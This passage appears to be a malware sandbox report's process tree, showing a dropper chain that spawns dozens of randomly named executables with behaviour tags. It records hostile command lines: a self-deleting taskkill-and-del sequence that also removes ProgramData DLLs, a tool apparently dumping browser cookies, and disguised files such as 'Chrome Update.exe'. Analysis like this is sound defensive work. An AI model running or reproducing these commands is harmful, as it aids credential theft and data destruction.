                                                                                                                                                                                                PID:6628
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:7008
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\setup_install.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\setup_install.exe"
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:6064
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:4160
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\karotima_2.exe
                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:1672
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\karotima_2.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\karotima_2.exe" -a
                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                    PID:7104
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:508
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06BD3266\karotima_1.exe
                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:6440
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\J3iQcRAUTGcuz6aJPFU7Mk4x.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\J3iQcRAUTGcuz6aJPFU7Mk4x.exe"
                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                          PID:3388
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\J3iQcRAUTGcuz6aJPFU7Mk4x.exe
                                                                                                                                                                                                                            C:\Users\Admin\Documents\J3iQcRAUTGcuz6aJPFU7Mk4x.exe
                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                              PID:7664
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GB2Bpc02jCWnSsL6D7fcnAF7.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\GB2Bpc02jCWnSsL6D7fcnAF7.exe"
                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                              PID:6336
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\YxinNEsq9wSfU6K60VhoRebP.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\YxinNEsq9wSfU6K60VhoRebP.exe"
                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                PID:1280
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\csY48SW8YeT8otE4VeewoY63.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\csY48SW8YeT8otE4VeewoY63.exe"
                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\csY48SW8YeT8otE4VeewoY63.exe
                                                                                                                                                                                                                                    C:\Users\Admin\Documents\csY48SW8YeT8otE4VeewoY63.exe
                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                      PID:7636
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uKIDiauptI_w3SFMmuh9PrMG.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\uKIDiauptI_w3SFMmuh9PrMG.exe"
                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                      PID:7012
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\uKIDiauptI_w3SFMmuh9PrMG.exe
                                                                                                                                                                                                                                        C:\Users\Admin\Documents\uKIDiauptI_w3SFMmuh9PrMG.exe
                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                          PID:7700
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\SKwUycH5DYwUboRK06TglIHR.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\SKwUycH5DYwUboRK06TglIHR.exe"
                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                          PID:4972
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\6fpSIx1mXnWcIuis6xJsYnjP.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\6fpSIx1mXnWcIuis6xJsYnjP.exe"
                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                            PID:6340
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                PID:7736
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\t12_hK5N4FMn3XqBVLS0QkKM.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\t12_hK5N4FMn3XqBVLS0QkKM.exe"
                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                PID:1340
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\t43DbYBF9UsG684EiqVKeQ8C.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\t43DbYBF9UsG684EiqVKeQ8C.exe"
                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                  PID:7216
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Zl0KDYOXtIIxWRKKsUtppq4e.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Zl0KDYOXtIIxWRKKsUtppq4e.exe"
                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                    PID:7252
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\JTzxZu9TPaExSyz28x4m0zDf.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\JTzxZu9TPaExSyz28x4m0zDf.exe"
                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                      PID:7284
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\SlfMwxkN8UXWbGh2JSa3egHH.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\SlfMwxkN8UXWbGh2JSa3egHH.exe"
                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                        PID:7244
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\O_tuF9BYoGDo0AorW9FHvK4s.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\O_tuF9BYoGDo0AorW9FHvK4s.exe"
                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                          PID:7388
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\QQNEKE1drH8kL1_w0JwlZlfG.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\QQNEKE1drH8kL1_w0JwlZlfG.exe"
                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                            PID:7492
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\ZNSWgejBtuivUiXiVAlozcAq.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\ZNSWgejBtuivUiXiVAlozcAq.exe"
                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                              PID:7576
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\25RB5LL0gz9kDO12HeWOnLue.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\25RB5LL0gz9kDO12HeWOnLue.exe"
                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                PID:7692
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\yPXaAHmf_a_gQNxG80_OTvrP.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\yPXaAHmf_a_gQNxG80_OTvrP.exe"
                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                  PID:7748
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\QQ9zFCPuLU82IFh8KNMRzLUY.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\QQ9zFCPuLU82IFh8KNMRzLUY.exe"
                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                    PID:7852
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\CZ2fDSpTMEU6XlxH46e0SCDY.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\CZ2fDSpTMEU6XlxH46e0SCDY.exe"
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                            PID:6668
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\nKAO1jSikWruXSWfuKaIG8QB.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\nKAO1jSikWruXSWfuKaIG8QB.exe"
                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                              PID:6736
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\3cXPVH9TOb59zrheKOX7Ndnq.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\3cXPVH9TOb59zrheKOX7Ndnq.exe"
                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                PID:6704
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\DIyHZSTYRaYwh2BOjJNEnoIo.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\DIyHZSTYRaYwh2BOjJNEnoIo.exe"
                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                  PID:6920
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\DIyHZSTYRaYwh2BOjJNEnoIo.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\DIyHZSTYRaYwh2BOjJNEnoIo.exe" -a
                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                      PID:4728
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\F2QRkhjf5nSJL8pZICpWOGdk.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\F2QRkhjf5nSJL8pZICpWOGdk.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:5272
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\MGSQcQasur4B5bASh2RUJRmr.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\MGSQcQasur4B5bASh2RUJRmr.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:5300
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\MGSQcQasur4B5bASh2RUJRmr.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\MGSQcQasur4B5bASh2RUJRmr.exe"
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:5356
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\RzagzO5J4DSzyUyMCQ0_Lvbu.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\RzagzO5J4DSzyUyMCQ0_Lvbu.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:5348
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\RzagzO5J4DSzyUyMCQ0_Lvbu.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\RzagzO5J4DSzyUyMCQ0_Lvbu.exe" -a
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\QsTBb22wwcHO9GA3rkVwGSSf.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\QsTBb22wwcHO9GA3rkVwGSSf.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:4620
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:5612
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\FESec3Xijkr8Ld8WV4Dsk69p.exe
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:5892
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\yxBO_GOAKOYpiXG1XJFEvnZ3.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\yxBO_GOAKOYpiXG1XJFEvnZ3.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\yxBO_GOAKOYpiXG1XJFEvnZ3.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\yxBO_GOAKOYpiXG1XJFEvnZ3.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6188
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\NnIevWBj5Pfnqv8Nu4fI8Sf2.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\NnIevWBj5Pfnqv8Nu4fI8Sf2.exe"
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:5392
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 660
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:3260
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 696
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:3168
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 676
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:4220
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 816
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 1072
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:6128
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\BbICf5ZxqLU3VrXPG1Gr1Id6.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\BbICf5ZxqLU3VrXPG1Gr1Id6.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:5696
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im BbICf5ZxqLU3VrXPG1Gr1Id6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\BbICf5ZxqLU3VrXPG1Gr1Id6.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:4940
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                          taskkill /im BbICf5ZxqLU3VrXPG1Gr1Id6.exe /f
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                          PID:4384
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                  PID:2072
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_6.exe
                                                                                                                                                                                                                                                                                    sonia_6.exe
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                    PID:2716
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:420
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:4304
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:3220
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                      PID:1332
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                      PID:3084
                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:3940
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_2.exe
                                                                                                                                                                                                                                                                                sonia_2.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                PID:3112
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0ABEC514\sonia_4.exe
                                                                                                                                                                                                                                                                                sonia_4.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                PID:3992
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  PID:3584
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:2484
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:4804
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      PID:4260
                                                                                                                                                                                                                                                                                      • C:\Windows\winnetdriv.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626739347 0
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:4168
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4852
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:3852
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4336
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 808
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:732
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 812
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:4824
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1032
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:5632
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1068
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:5920
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4640
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 4640 -s 1008
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                          PID:5112
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4476
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                    PID:4056
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                    PID:2452
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:2272
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:4544
